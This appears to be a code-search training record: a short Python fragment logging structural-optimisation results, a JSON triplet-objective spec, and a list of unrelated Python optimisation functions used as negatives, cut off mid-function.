    tskRecord.append(dim[2])
    massRecord.append(mass(dim))
    rsfSkinRecord.append(skinBuckle(dim)+1)
    rsfStiffRecord.append(stiffenerBuckle(dim)+1)
    rsfMatRecord.append(matFail(dim)+1.1)
    rsfEulerRecord.append(eulerBuckle(dim)+1.1)
    print(dim, mass(dim))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def Optimize(self):\n self._OpenOutputFiles()\n while self.n_iter < self.n_maxiter and not self.is_converged:\n self.n_iter += 1\n self._ChooseStepDirection(self.opt_type)\n self._LineSearch(-1.0 * self.step_dir)\n self._UpdateEnergy()\n self._UpdateGradient()\n self.traj.AppendStep(self.mol)\n self._UpdateCriteria()\n self._CheckConvergence()\n self._PrintStatus()\n self._CloseOutputFiles()", "def optimize(self):\n \n if self.verbose:\n print('Starting grid search with bounds: [' + \\\n ';'.join(['%5g to %5g']*len(self.steps))%tuple([(self.steps[i][0], self.steps[i][-1]) for i in range(len(self.steps))]) +']')\n\n for params in self._get_next_point():\n self.transform.set_params(params)\n\n v, _ = self.measure.value_and_derivatives(self.transform)\n\n if v < self.best_value:\n self.best_value = v\n self.best_params = params\n# print('New best value %2.4f at ('%v, ', '.join(['%8.3f']*len(params))%tuple(params), ')')\n\n self.value_history.append(v)\n self.last_value = v\n self.iteration += 1\n\n if self.report_freq > 0 and (self.iteration % self.report_freq == 0) and self.report_func is not None:\n self.report_func(self)\n\n # Set the best transform\n self.transform.set_params(self.best_params)\n self.last_value = self.best_value\n return self.best_value", "def _optimization_loop(self, iteration=0):\n self.logger.print_optimization_header()\n\n while iteration < self.iterations:\n try:\n self._execute_experiment()\n except RepeatedExperimentError:\n # G.debug_(F'Skipping repeated Experiment: {_ex!s}\\n')\n if len(self.similar_experiments) + len(self.tested_keys) >= self.search_space_size:\n G.log_(f\"Hyperparameter search space has been exhausted\")\n break\n self.skipped_iterations += 1\n continue\n except StopIteration:\n if len(self.similar_experiments) + len(self.tested_keys) >= self.search_space_size:\n G.log_(f\"Hyperparameter search space has been exhausted\")\n break\n # G.debug_(f'Re-initializing hyperparameter grid after testing {len(self.tested_keys)} keys')\n self._set_hyperparameter_space()\n continue\n\n self.logger.print_result(\n self.current_hyperparameters_list,\n self.current_score,\n experiment_id=self.current_experiment.experiment_id,\n )\n\n if (\n (self.best_experiment is None) # First evaluation\n or (self.do_maximize and (self.best_score < self.current_score)) # New best max\n or (not self.do_maximize and (self.best_score > self.current_score)) # New best min\n ):\n self.best_experiment = self.current_experiment.experiment_id\n self.best_score = self.current_score\n\n iteration += 1", "def go(self):\n if self.model_initializer is None:\n raise ValueError(\"Experiment guidelines must be set before starting optimization\")\n\n _reporter_params = dict(dict(do_maximize=self.do_maximize), **self.reporter_parameters)\n self.logger = OptimizationReporter([_.name for _ in self.dimensions], **_reporter_params)\n\n self.tested_keys = []\n self._set_hyperparameter_space()\n self._find_similar_experiments()\n\n loop_start_time = datetime.now()\n self._optimization_loop()\n loop_end_time = datetime.now()\n G.log_(f\"Optimization loop completed in {loop_end_time - loop_start_time}\")\n G.log_(f'Best score was {self.best_score} from Experiment \"{self.best_experiment}\"')\n self._clean_up_optimization()", "def iterations(self):\n i = 0\n stateVectorConv = self.stateVectorConvThreshold * 1.0e6\n n = len(self.model.stateVector)\n self.answer = None\n \n while ((i < self.maxiter) \n and (stateVectorConv > self.stateVectorConvThreshold)\n ):\n \n F, K = self.model()\n \n if 
np.any(np.isnan(F)) or np.any(np.isnan(K)):\n m = \"Iteration {0} failure of model.\"\n raise OptimalEstimationException(m.format(i))\n \n if self.model.verbose > 0:\n self.model.plot(i+1, stateVectorConv)\n \n try:\n self.DecomposeJacobian(K)\n except np.linalg.LinAlgError:\n m = \"Iteration {0} failure in decomposition.\"\n raise OptimalEstimationException(m.format(i))\n \n statevectorOffset = (self.V.T * self.priorSinvh * \n np.matrix(np.array(self.model.stateVector) - np.array(self.model.prior) ).T)\n measurementOffset = (self.U.T * self.errSinvh * \n np.matrix(self.model.observation - F).T)\n \n newState = np.matrix((self.w * \n (measurementOffset.A1 + \n self.w * statevectorOffset.A1))/(self.w**2+1.0)).T\n newState = self.priorSh * self.V * newState\n newState = newState.A1 + self.model.prior\n \n stateVectorConv = ((np.matrix(newState - self.model.stateVector) * \n self.Sinv * np.matrix(newState - self.model.stateVector).T)/n)[0,0]\n self.model.stateVector = newState\n\n if i == 0:\n \n stateVectorConv = self.stateVectorConvThreshold * 1.0e6\n \n print('cost Function for iteration {}:'.format(i), self.costFunction)\n\n i += 1\n \n F, K = self.model()\n if self.model.verbose > 0:\n self.model.plot(i+1, stateVectorConv)\n \n try:\n self.DecomposeJacobian(K)\n except np.linalg.LinAlgError:\n raise OptimalEstimationException(\"Failure in decomposition.\")\n \n Wplus2 = np.matrix(np.diag(1.0/(self.w**2+1.0)))\n self.model.covariance = (self.priorSh * self.V * Wplus2 * \n self.V.T * self.priorSh)\n \n\n \n return i, stateVectorConv", "def optimize(self):\n self.vbe_step()\n self.compute_responsibilities()\n self.compute_sufficient_stats()\n self.vbmstep()", "def solve(self):\n\n # Open status display\n fmtstr, nsep = self.display_start()\n\n # Start solve timer\n self.timer.start(['solve', 'solve_wo_func', 'solve_wo_rsdl',\n 'solve_wo_btrack'])\n\n # Main optimisation iterations\n for self.k in range(self.k, self.k + self.opt['MaxMainIter']):\n\n # Update record of X and Y from previous iteration\n self.on_iteration_start()\n\n # Compute backtracking\n if self.opt['Backtrack'] is not None and self.k >= 0:\n self.timer.stop('solve_wo_btrack')\n # Compute backtracking\n self.backtrack.update(self)\n self.timer.start('solve_wo_btrack')\n else:\n # Compute just proximal step\n self.xstep()\n # Update by combining previous iterates\n self.ystep()\n\n # Compute residuals and stopping thresholds\n self.timer.stop(['solve_wo_rsdl', 'solve_wo_btrack'])\n if not self.opt['FastSolve']:\n frcxd, adapt_tol = self.compute_residuals()\n self.timer.start('solve_wo_rsdl')\n\n # Compute and record other iteration statistics and\n # display iteration stats if Verbose option enabled\n self.timer.stop(['solve_wo_func', 'solve_wo_rsdl',\n 'solve_wo_btrack'])\n if not self.opt['FastSolve']:\n itst = self.iteration_stats(self.k, frcxd)\n self.itstat.append(itst)\n self.display_status(fmtstr, itst)\n self.timer.start(['solve_wo_func', 'solve_wo_rsdl',\n 'solve_wo_btrack'])\n\n # Call callback function if defined\n if self.opt['Callback'] is not None:\n if self.opt['Callback'](self):\n break\n\n # Stop if residual-based stopping tolerances reached\n if not self.opt['FastSolve']:\n if frcxd < adapt_tol:\n break\n\n # Increment iteration count\n self.k += 1\n\n # Record solve time\n self.timer.stop(['solve', 'solve_wo_func', 'solve_wo_rsdl',\n 'solve_wo_btrack'])\n\n # Print final separator string if Verbose option enabled\n self.display_end(nsep)\n\n return self.getmin()", "def _optimise(self):\n pass", "def 
optimizer_callback(current_theta):\n\n global optimizer_data\n global optimizer_len\n\n optimizer_data.append(current_theta)\n optimizer_len += 1\n return False", "def optimize(self, iterations=1000):\r\n prev = None\r\n finalx = None\r\n finaly = None\r\n while iterations:\r\n maxei, eis = self.acquisition()\r\n new_y = self.f(maxei)\r\n if maxei == prev:\r\n break\r\n self.gp.update(maxei, new_y)\r\n pycodehack = finaly is None or self.minimize and finaly > new_y\r\n if ((pycodehack or not self.minimize and finaly < new_y)):\r\n finaly = new_y\r\n finalx = maxei\r\n prev = maxei\r\n iterations -= 1\r\n return finalx, finaly", "def accept_optimize():\n pass", "def run_optimization(self):\n # Get batch\n (obs, action, old_logp, old_value, return_, advantage) = self.buffer.eject()\n\n # Train pi\n print(\"-\" * 20 + \"\\nPi Update\" + \"\\n\" + \"-\" * 20)\n (policy_loss, entropy,\n kl_divergence, clipping_fraction, steps) = self.update_actor(obs, action, old_logp, advantage)\n\n # Train value function\n print(\"-\" * 20 + \"\\nValue Function Update\" + \"\\n\" + \"-\" * 20)\n (value_loss,\n explained_variance) = self.update_critic(obs, old_value, return_)\n\n # Logging\n self.update_counter += 1\n self.log_update(policy_loss, entropy, kl_divergence, clipping_fraction,\n value_loss, explained_variance, steps)\n\n # Update learning rate\n self.decay_lr()\n\n # Save current weights (overwrites previous weights)\n self.save_weights()\n\n # Empty scenario counter\n self.scenario_counter = dict.fromkeys(self.scenario_counter, 0)", "def _optimization_closure(self, iteration, step):\n aug = self._get_augmentation(iteration)\n if iteration == self.num_iter_per_step - 1:\n reg_noise_std = 0\n aug = 0\n else:\n reg_noise_std = (1 / 1000.) * (iteration // 400)\n # creates left_net_inputs and right_net_inputs by adding small noise\n clean_nets_inputs = [clean_net_input[aug] + (clean_net_input[aug].clone().normal_() * reg_noise_std)\n for clean_net_input in self.clean_nets_inputs]\n watermark_net_input = self.watermark_net_input[aug] # + (self.watermark_net_input[aug].clone().normal_() * reg_noise_std)\n mask_net_input = self.mask_net_input[aug]\n # applies the nets\n self.clean_nets_outputs = [clean_net(clean_net_input) for clean_net, clean_net_input\n in zip(self.clean_nets, clean_nets_inputs)]\n self.watermark_net_output = self.watermark_net(watermark_net_input)\n self.mask_net_output = self.mask_net(mask_net_input)\n self.total_loss = 0\n self.blur = 0\n\n self.total_loss += sum(self.l1_loss(self.watermark_net_output * self.mask_net_output +\n clean_net_output * (1 - self.mask_net_output), image_torch[aug])\n for clean_net_output, image_torch in zip(self.clean_nets_outputs, self.images_torch))\n self.total_loss.backward(retain_graph=True)", "def Optimize(self):\n return _gmat_py.ExternalOptimizer_Optimize(self)", "def fit(self):\n if self.minimizer == \"differential_evolution\":\n kwargs = {\"maxiter\": self._maxiter}\n elif self.minimizer == \"shgo\":\n kwargs = {\"options\": {\"maxiter\": self._maxiter,\n \"jac\": self.cost_func.jac_cost}}\n elif self.minimizer == \"dual_annealing\":\n kwargs = {\"maxiter\": self._maxiter, \"local_search_options\": {\n \"jac\": self.cost_func.jac_cost}}\n fun = self.cost_func.eval_cost\n bounds = self.value_ranges\n algorithm = getattr(optimize, self.minimizer)\n result = algorithm(fun, bounds, **kwargs)\n self._popt = result.x\n if result.success:\n self._status = 0\n elif \"Maximum number of iteration\" in result.message:\n self._status = 1\n else:\n 
self._status = 2", "def run_and_store(self):\n # Initialization assumptions\n z = self.draw_normal_initial()\n gradient = self.cv_gradient_initial(z)\n gradient[np.isnan(gradient)] = 0\n variance = np.power(gradient,2) \n final_parameters = self.current_parameters()\n final_samples = 1\n\n # Create optimizer\n if self.optimizer == 'ADAM':\n self.optim = ADAM(final_parameters, variance, self.learning_rate, 0.9, 0.999)\n elif self.optimizer == 'RMSProp':\n self.optim = RMSProp(final_parameters, variance, self.learning_rate, 0.99)\n\n # Stored updates\n stored_means = np.zeros((self.iterations,len(final_parameters)/2))\n stored_predictive_likelihood = np.zeros(self.iterations)\n\n # Record elbo\n if self.record_elbo is True:\n elbo_records = np.zeros(self.iterations)\n else:\n elbo_records = None\n\n for i in range(self.iterations):\n gradient = self.cv_gradient(self.draw_normal())\n gradient[np.isnan(gradient)] = 0\n new_parameters = self.optim.update(gradient)\n self.change_parameters(new_parameters)\n\n stored_means[i] = self.optim.parameters[::2]\n stored_predictive_likelihood[i] = self.neg_posterior(stored_means[i])\n\n if self.printer is True:\n self.print_progress(i,self.optim.parameters[::2])\n\n # Construct final parameters using final 10% of samples\n if i > self.iterations-round(self.iterations/10):\n final_samples += 1\n final_parameters = final_parameters+self.optim.parameters\n\n if self.record_elbo is True:\n elbo_records[i] = self.get_elbo(self.optim.parameters[::2])\n\n final_parameters = final_parameters/float(final_samples)\n self.change_parameters(final_parameters)\n final_means = np.array([final_parameters[el] for el in range(len(final_parameters)) if el%2==0])\n final_ses = np.array([final_parameters[el] for el in range(len(final_parameters)) if el%2!=0])\n\n if not self.quiet_progress:\n print(\"\")\n print(\"Final model ELBO is \" + str(-self.neg_posterior(final_means)-self.create_normal_logq(final_means)))\n return self.q, final_means, final_ses, stored_means, stored_predictive_likelihood, elbo_records", "def run_and_store(self):\n # Initialization assumptions\n z = self.draw_normal_initial()\n gradient = self.cv_gradient_initial(z)\n gradient[np.isnan(gradient)] = 0\n variance = np.power(gradient,2) \n final_parameters = self.current_parameters()\n final_samples = 1\n\n # Create optimizer\n if self.optimizer == 'ADAM':\n self.optim = ADAM(final_parameters, variance, self.learning_rate, 0.9, 0.999)\n elif self.optimizer == 'RMSProp':\n self.optim = RMSProp(final_parameters, variance, self.learning_rate, 0.99)\n\n # Stored updates\n stored_means = np.zeros((self.iterations,len(final_parameters)/2))\n stored_predictive_likelihood = np.zeros(self.iterations)\n\n # Record elbo\n if self.record_elbo is True:\n elbo_records = np.zeros(self.iterations)\n else:\n elbo_records = None\n\n for i in range(self.iterations):\n gradient = self.cv_gradient(self.draw_normal())\n gradient[np.isnan(gradient)] = 0\n new_parameters = self.optim.update(gradient)\n self.change_parameters(new_parameters)\n\n stored_means[i] = self.optim.parameters[::2]\n stored_predictive_likelihood[i] = self.neg_posterior(stored_means[i])\n\n if self.printer is True:\n self.print_progress(i,self.optim.parameters[::2])\n\n # Construct final parameters using final 10% of samples\n if i > self.iterations-round(self.iterations/10):\n final_samples += 1\n final_parameters = final_parameters+self.optim.parameters\n\n if self.record_elbo is True:\n elbo_records[i] = self.get_elbo(self.optim.parameters[::2])\n\n 
final_parameters = final_parameters/float(final_samples)\n self.change_parameters(final_parameters)\n final_means = np.array([final_parameters[el] for el in range(len(final_parameters)) if el%2==0])\n final_ses = np.array([final_parameters[el] for el in range(len(final_parameters)) if el%2!=0])\n\n if not self.quiet_progress:\n print(\"\")\n print(\"Final model ELBO is \" + str(-self.full_neg_posterior(final_means)-self.create_normal_logq(final_means)))\n return self.q, final_means, final_ses, stored_means, stored_predictive_likelihood, elbo_records", "def run_qae_optimization(training_states, n_repetitions, exact=no_noise, noisy=gate_error):\n result_list = []\n def proxy(params, training_states, n_repetitions, exact=no_noise, noisy=gate_error):\n \"\"\"Embedded function version\n \"\"\"\n input_list = fix_list(params, all_param_array=all_param, var_param_array=var_param, fixed_vals_array=fixed_vals)\n fidelities = []\n for training_state in training_states:\n fid = cusp_stage2.compute_stage2_cost_function(*input_list, alpha=training_state, n_repetitions=n_repetitions,\n exact=exact, noisy=noisy)\n fidelities.append(fid)\n avg_fid = np.mean(fidelities)\n result_list.append(1-avg_fid)\n print(1-avg_fid)\n return 1. - avg_fid\n\n \n # Initialize parameters\n half_turn_min = 0\n half_turn_max = 2\n init_params = np.random.uniform(low=half_turn_min, high=half_turn_max,\n size=num_param)\n\n # Optimization using Nelder-Mead.\n h2_qae_wrap = lambda params: proxy(params, training_states=training_states,\n n_repetitions=n_repetitions, exact=exact, noisy=noisy)\n \n if noisy:\n maxiter = 60\n else:\n maxiter = None\n \n res = minimize(h2_qae_wrap, init_params, args=(),\n method='Nelder-Mead', tol=None, \n options={'disp': False, 'maxiter': maxiter, 'xatol': 0.001,\n 'return_all': False, 'fatol': 0.001})\n np.savetxt('stage2_data.csv',result_list, delimiter=',')\n return res.x", "def example():\n Optimizer = BFGS(f, g)\n startPoint = 100 * numpy.ones(2);\n res = Optimizer.optimize(startPoint,\n epsilon=1e-5,\n maxIterations=10)\n print res\n pass", "def optimize(self, optimizer=None, start=None, messages=False, max_iters=1000, ipython_notebook=True, clear_after_finish=False, **kwargs):\n self.inference_method.on_optimization_start()\n try:\n super(GPMSGP, self).optimize(optimizer, start, messages, max_iters, ipython_notebook, clear_after_finish, **kwargs)\n except KeyboardInterrupt:\n print(\"KeyboardInterrupt caught, calling on_optimization_end() to round things up\")\n self.inference_method.on_optimization_end()\n raise\n \n self.posterior_prediction = self.inference_method.update_prediction_vectors(self.kern,self.posterior,self.grad_dict,self.likelihood)", "def _on_step(self) -> None:\n self._n_calls += 1\n # Account for multiple environments\n # each call to step() corresponds to n_envs transitions\n if self._n_calls % max(self.target_update_interval // self.n_envs, 1) == 0:\n polyak_update(self.q_net.parameters(), self.q_net_target.parameters(), self.tau)\n # Copy running stats, see GH issue #996\n polyak_update(self.batch_norm_stats, self.batch_norm_stats_target, 1.0)\n\n self.exploration_rate = self.exploration_schedule(self._current_progress_remaining)\n self.logger.record(\"rollout/exploration_rate\", self.exploration_rate)", "def optimization_step(self):\n \n if \"CSS\" in self.algorithm:\n \n input_dict = {self.x: self.train_inputs[self.minibatch_set,:]}\n \n var_list = [self.x_tilda, self.minibatch_set]\n \n if (self.num_samples > 0) and (not self.mixture):\n \n if ((self.mf_steps > 0) 
and self.alpha >0) or\\\n self.gibbs_steps > 0: \n \n var_list.append(self.sampler_theta)\n \n elif \"CD\" in self.algorithm:\n \n input_dict = {self.x : self.train_inputs[self.minibatch_set,:]} \n \n var_list = [self.minibatch_set]\n \n var_list.append(self.learning_rate)\n \n if self.use_momentum:\n \n var_list.append(self.momentum)\n \n output_vars = [self.pseudo_cost]\n \n if self.report_p_tilda:\n \n output_vars.append(self.p_tilda)\n \n else:\n \n output_vars.append(theano.shared(0))\n \n opt_step = theano.function(inputs = var_list,\n outputs = output_vars,\n updates = self.updates,\n givens = input_dict,\n on_unused_input='warn')\n \n return opt_step", "def opt_wrapper(m, **kwargs):\r\n m.optimize(**kwargs)\r\n return m.optimization_runs[-1]", "def algorithm_loop(self):", "def propose_optimize():\n pass", "def run(self, C, p0 = None):\n global algorithm \n algorithm = AdaptiveMM(self.g, C, p0 = p0, lambda0 = 2000)\n solve()", "def Solve(self, cost, termination=None, ExtraArgs=(), **kwds):\n # process and activate input settings\n sigint_callback = kwds.pop('sigint_callback', None)\n settings = self._process_inputs(kwds)\n disp = settings['disp'] if 'disp' in settings else False\n echo = settings['callback'] if 'callback' in settings else None\n# for key in settings:\n# exec \"%s = settings['%s']\" % (key,key)\n if disp in ['verbose', 'all']: verbose = True\n else: verbose = False\n #-------------------------------------------------------------\n\n from python_map import python_map\n if self._map != python_map:\n #FIXME: EvaluationMonitor fails for MPI, throws error for 'pp'\n from mystic.monitors import Null\n evalmon = Null()\n else: evalmon = self._evalmon\n fcalls, cost = wrap_function(cost, ExtraArgs, evalmon)\n\n # set up signal handler\n #self._EARLYEXIT = False\n self._generateHandler(sigint_callback) \n\n # activate signal_handler\n #import threading as thread\n #mainthread = isinstance(thread.current_thread(), thread._MainThread)\n #if mainthread: #XXX: if not mainthread, signal will raise ValueError\n import signal\n if self._handle_sigint:\n signal.signal(signal.SIGINT,self.signal_handler)\n\n # register termination function\n if termination is not None: self.SetTermination(termination)\n\n # get the nested solver instance\n solver = self._AbstractEnsembleSolver__get_solver_instance()\n #-------------------------------------------------------------\n\n # generate starting points\n initial_values = self._InitialPoints()\n\n # run optimizer for each grid point\n from copy import deepcopy as _copy\n op = [_copy(solver) for i in range(len(initial_values))]\n #cf = [cost for i in range(len(initial_values))]\n vb = [verbose for i in range(len(initial_values))]\n cb = [echo for i in range(len(initial_values))] #XXX: remove?\n at = self.id if self.id else 0 # start at self.id\n id = range(at,at+len(initial_values))\n\n # generate the local_optimize function\n def local_optimize(solver, x0, rank=None, disp=False, callback=None):\n from copy import deepcopy as _copy\n from mystic.tools import isNull\n solver.id = rank\n solver.SetInitialPoints(x0)\n if solver._useStrictRange: #XXX: always, settable, or sync'd ?\n solver.SetStrictRanges(min=solver._strictMin, \\\n max=solver._strictMax) # or lower,upper ?\n solver.Solve(cost, disp=disp, callback=callback)\n sm = solver._stepmon\n em = solver._evalmon\n if isNull(sm): sm = ([],[],[],[])\n else: sm = (_copy(sm._x),_copy(sm._y),_copy(sm._id),_copy(sm._info))\n if isNull(em): em = ([],[],[],[])\n else: em = 
(_copy(em._x),_copy(em._y),_copy(em._id),_copy(em._info))\n return solver, sm, em\n\n # map:: solver = local_optimize(solver, x0, id, verbose)\n results = self._map(local_optimize, op, initial_values, id, \\\n vb, cb, **self._mapconfig)\n\n # save initial state\n self._AbstractSolver__save_state()\n #XXX: HACK TO GET CONTENT OF ALL MONITORS\n # reconnect monitors; save all solvers\n from mystic.monitors import Monitor\n while results: #XXX: option to not save allSolvers? skip this and _copy\n _solver, _stepmon, _evalmon = results.pop()\n sm = Monitor()\n sm._x,sm._y,sm._id,sm._info = _stepmon\n _solver._stepmon.extend(sm)\n del sm\n em = Monitor()\n em._x,em._y,em._id,em._info = _evalmon\n _solver._evalmon.extend(em)\n del em\n self._allSolvers[len(results)] = _solver\n del results, _solver, _stepmon, _evalmon\n #XXX: END HACK\n\n # get the results with the lowest energy\n self._bestSolver = self._allSolvers[0]\n bestpath = self._bestSolver._stepmon\n besteval = self._bestSolver._evalmon\n self._total_evals = self._bestSolver.evaluations\n for solver in self._allSolvers[1:]:\n self._total_evals += solver.evaluations # add func evals\n if solver.bestEnergy < self._bestSolver.bestEnergy:\n self._bestSolver = solver\n bestpath = solver._stepmon\n besteval = solver._evalmon\n\n # return results to internals\n self.population = self._bestSolver.population #XXX: pointer? copy?\n self.popEnergy = self._bestSolver.popEnergy #XXX: pointer? copy?\n self.bestSolution = self._bestSolver.bestSolution #XXX: pointer? copy?\n self.bestEnergy = self._bestSolver.bestEnergy\n self.trialSolution = self._bestSolver.trialSolution #XXX: pointer? copy?\n self._fcalls = self._bestSolver._fcalls #XXX: pointer? copy?\n self._maxiter = self._bestSolver._maxiter\n self._maxfun = self._bestSolver._maxfun\n\n # write 'bests' to monitors #XXX: non-best monitors may be useful too\n self._stepmon = bestpath #XXX: pointer? copy?\n self._evalmon = besteval #XXX: pointer? 
copy?\n self.energy_history = None\n self.solution_history = None\n #from mystic.tools import isNull\n #if isNull(bestpath):\n # self._stepmon = bestpath\n #else:\n # for i in range(len(bestpath.y)):\n # self._stepmon(bestpath.x[i], bestpath.y[i], self.id)\n # #XXX: could apply callback here, or in exec'd code\n #if isNull(besteval):\n # self._evalmon = besteval\n #else:\n # for i in range(len(besteval.y)):\n # self._evalmon(besteval.x[i], besteval.y[i])\n #-------------------------------------------------------------\n\n # restore default handler for signal interrupts\n if self._handle_sigint:\n signal.signal(signal.SIGINT,signal.default_int_handler)\n\n # log any termination messages\n msg = self.Terminated(disp=disp, info=True)\n if msg: self._stepmon.info('STOP(\"%s\")' % msg)\n # save final state\n self._AbstractSolver__save_state(force=True)\n return", "def run(self):\n # print(\"111\"+\"--- %s seconds ---\" % (time.time() ))\n err = self.params.tolerance + 1\n for iter_num in range(self.params.max_iter):\n if err <= self.params.tolerance:\n break\n # print(\"11\"+str(iter_num)+\"--- %s seconds ---\" % (time.time() - start_time))\n qprev = self.sigma2\n\n self._expectation_iter(iter_num)\n self._maximization_iter(iter_num)\n\n if self.sigma2 <= 0:\n self.sigma2 = self.params.tolerance / 10\n err = np.abs(self.sigma2 - qprev)\n\n if callable(self.callback):\n kwargs = {\n 'iteration': iter_num,\n 'error': err,\n 'X': self.X,\n 'Y': self.TY,\n 'W': self.W,\n 'P': self.P\n }\n self.callback(**kwargs)\n return self.TY", "def opt_wrapper(m, **kwargs):\n m.optimize(**kwargs)\n return m.optimization_runs[-1]", "def Optimize(self):\n return _gmat_py.Optimizer_Optimize(self)", "def optimize(cls, trials, score, evals_rounds, mon_cons, categorical):\n raise NotImplementedError", "def optimize(self, objectivefct, logger=None, verb_disp=20, iterations=None):\r\n if logger is None:\r\n if hasattr(self, 'logger'):\r\n logger = self.logger\r\n\r\n citer = 0\r\n while not self.stop():\r\n if iterations is not None and citer >= iterations:\r\n return self.result()\r\n citer += 1\r\n\r\n X = self.ask() # deliver candidate solutions\r\n fitvals = [objectivefct(x) for x in X]\r\n self.tell(X, fitvals) # all the work is done here\r\n\r\n self.disp(verb_disp)\r\n logger.add(self) if logger else None\r\n\r\n logger.add(self, modulo=bool(logger.modulo)) if logger else None\r\n if verb_disp:\r\n self.disp(1)\r\n if verb_disp in (1, True):\r\n print('termination by', self.stop())\r\n print('best f-value =', self.result()[1])\r\n print('solution =', self.result()[0])\r\n\r\n return self.result() + (self.stop(), self, logger)", "def run_optimization(config,\n blackbox_optimizer,\n init_current_input,\n init_best_input,\n init_best_core_hyperparameters,\n init_best_value,\n init_iteration,\n workers,\n log_bool=False):\n current_input = init_current_input\n best_input = init_best_input\n best_core_hyperparameters = init_best_core_hyperparameters\n best_value = [init_best_value]\n iteration = init_iteration\n\n while True:\n print(iteration)\n sys.stdout.flush()\n success, current_input = run_step_rpc_blackbox_optimizer(\n config, current_input, blackbox_optimizer, workers, iteration,\n best_input, best_core_hyperparameters, best_value, log_bool)\n if success:\n iteration += 1\n if iteration == config.nb_iterations:\n break", "def iterate(self, update_func):\n if self.disc_param_save_on_error:\n update_func = param_file.wrap_with_save_on_error(\n self.gan.discriminator,\n self.datastore.path('disc_param', 
'pre_error.npz'),\n self.datastore.path('disc_param', 'post_error.npz'),\n )(update_func)\n\n self.pre_loop()\n logger.info('%s: start iterations', self.__class__.__name__)\n with recording_exit_reason(self.datastore):\n for gen_step in range(self.iterations):\n self.post_update(gen_step, update_func(gen_step))\n logger.info('%s: maximum iterations reached', self.__class__.__name__)", "def __call__(self, fgraph):\r\n return self.optimize(fgraph)", "def step(self, closure=None):\n orig_loss,err,pred = closure()\n loss = orig_loss\n\n group = self.param_groups[0]\n lr = group['lr']\n decay_lr = group['decay_lr']\n max_iter = group['max_iter']\n reg = group['reg']\n backtrack = group['backtrack']\n bt_alpha = group['bt_alpha']\n bt_beta = group['bt_beta']\n sketch_size = group['sketch_size']\n tolerance = group['tolerance']\n\n #import pdb; pdb.set_trace()\n n = err.shape[0] #batch size\n #If sketching the jacobian, randomly select [sketch_size] samples\n \n if sketch_size is not None:\n idx = torch.randperm(n)[:sketch_size]\n else:\n idx = torch.arange(n) #Don't sketch, use all samples\n \n w0 = nn.utils.parameters_to_vector(self._params) #weight parameters in vector form\n \n #Compute Gauss-Newton vector product \n grad, ggnvp = _make_ggnvp(err,self._params,w0,n,reg,idx) #return gradient in vector form + ggnvp function\n #Solve for the Conjugate Gradient Direction\n dw, cost_log = _conjugate_gradient(ggnvp, grad, max_iter, tolerance)\n\n #Perform backtracking line search\n val = loss + 0.5 * reg * torch.norm(w0)**2\n fprime = -1*dw @ grad\n \n self.grad_update += 1\n if backtrack > 0:\n t = lr\n\n #TODO: If using backtracking, get new loss with (w0 - t*dw) as network parameters\n bts = 0\n alpha = bt_alpha\n beta = bt_beta \n while (loss + 0.5 * reg * torch.norm(w0 - t*dw)**2 > val + alpha * t * fprime):\n t = beta * t\n bts += 1\n if bts > backtrack:\n print('Maximum backtracking reached, accuracy not guaranteed')\n break\n elif decay_lr: #decay lr\n t = lr/np.maximum(1, self.grad_update-10)\n else: #use lr step-size\n t = lr\n\n print('step size: {}'.format(t))\n\n #Update the model parameters\n self._add_grad(-t, dw)\n \n return val, pred", "def callback(self, parameters):\n print(\"\\nFinsished Iteration: {}\".format(self.current_iteration), flush=True)\n print(\"Current Parameters: {}\".format(parameters), flush=True)\n\n # If getting the value history, perform an evaluation with current parameters\n\n print(\"Starting Next Iteration...\", flush=True)\n\n # Update currrent_iteration index and add new blank history\n self.current_iteration += 1", "def do_optimisation(self):\n\n print('--> Parameters for optimisation:')\n print('--> Using measurements : {}'.format(self.stoma_cfg.comparison_helper.optimisation_keys))\n print('')\n\n x0 = self.initial_guess()\n\n tol, eps = 1e-4, 0.001\n\n print('--> Using SLSQP with tol={} and eps={}'.format(tol, eps))\n\n soln = opt.minimize(fun=self.optimise_fn,\n x0=x0,\n method='SLSQP',\n tol=tol,\n options={'eps': eps})\n\n print('*' * 120)\n print('--> Optimisation procedure has finished...')\n print(soln)\n print('*' * 120)\n\n if soln.success:\n print('--> Optimisation succeeded. 
Result is...')\n self._set_material_parameters(soln.x)\n print('--> {}'.format(self.material_model))\n else:\n print('--> The optimisation failed!')\n\n print('*' * 120)\n\n return soln", "def VFI(method) :\n iteration=0 # Iteration Counter\n converged = 0 # Convergence Flag|\n \n#----- Initial Settings \n v_update = zeros(n_grid)\n v_func = empty(n_grid)\n k_next_vec = empty(n_grid)\n run_time = empty(2)\n \n def obj(k_next) :\n \"\"\"\n This function is used in value function iteration.\n It represents the objective function to be maximized for one node (state) of current capitals.\n Resulting value is maximized one corresponding to next period's capital as a maximizer. \n Next period's value is computed by interpolation.\n \n Input : k_next (next period's capital)\n \n Output : value_vec (maximized value resulting from choosing optimal capital in the next period)\n \"\"\" \n \n if method==1 :\n value_vec = -1 * (log(A*k_current**(alpha) - k_next) + beta*linear_interp(k_grid,v_update,k_next))\n elif method==2 :\n value_vec = -1 * (log(A*k_current**(alpha) - k_next) + beta*quad_interp(k_grid,v_update,k_next))\n elif method==3 :\n value_vec = -1 * (log(A*k_current**(alpha) - k_next) + beta*cubic_interp(k_grid,v_update,k_next))\n \n return value_vec\n\n#----- Value function iteration\n start = time.time() # start time\n while converged==0 :\n index = 0\n for k_current in k_grid :\n k_next = fminbound(obj,k_grid[0],k_grid[-1])\n v_func[index] = (-1) * obj(k_next)\n k_next_vec[index] = k_next\n index = index + 1\n dist = abs(max(v_func - v_update))\n if dist<tol :\n converged = 1\n v_k, g_k = v_func, k_next_vec\n v_update = v_func\n print \"Iteration : \",iteration,\"\",\"Distance : \",dist # convergence process\n iteration = iteration + 1\n v_func = empty(n_grid) \n k_next_vec = empty(n_grid)\n \n end = time.time() # end time\n run_time[0],run_time[1] = runtime_cal(start,end) # total running time\n \n return v_k, g_k, run_time, iteration", "def run(self):\n\n # Initialization assumptions\n z = self.draw_normal_initial()\n gradient = self.cv_gradient_initial(z)\n gradient[np.isnan(gradient)] = 0\n variance = np.power(gradient, 2) \n final_parameters = self.current_parameters()\n final_samples = 1\n\n # Create optimizer\n if self.optimizer == 'ADAM':\n self.optim = ADAM(final_parameters, variance, self.learning_rate, 0.9, 0.999)\n elif self.optimizer == 'RMSProp':\n self.optim = RMSProp(final_parameters, variance, self.learning_rate, 0.99)\n\n # Record elbo\n if self.record_elbo is True:\n elbo_records = np.zeros(self.iterations)\n else:\n elbo_records = 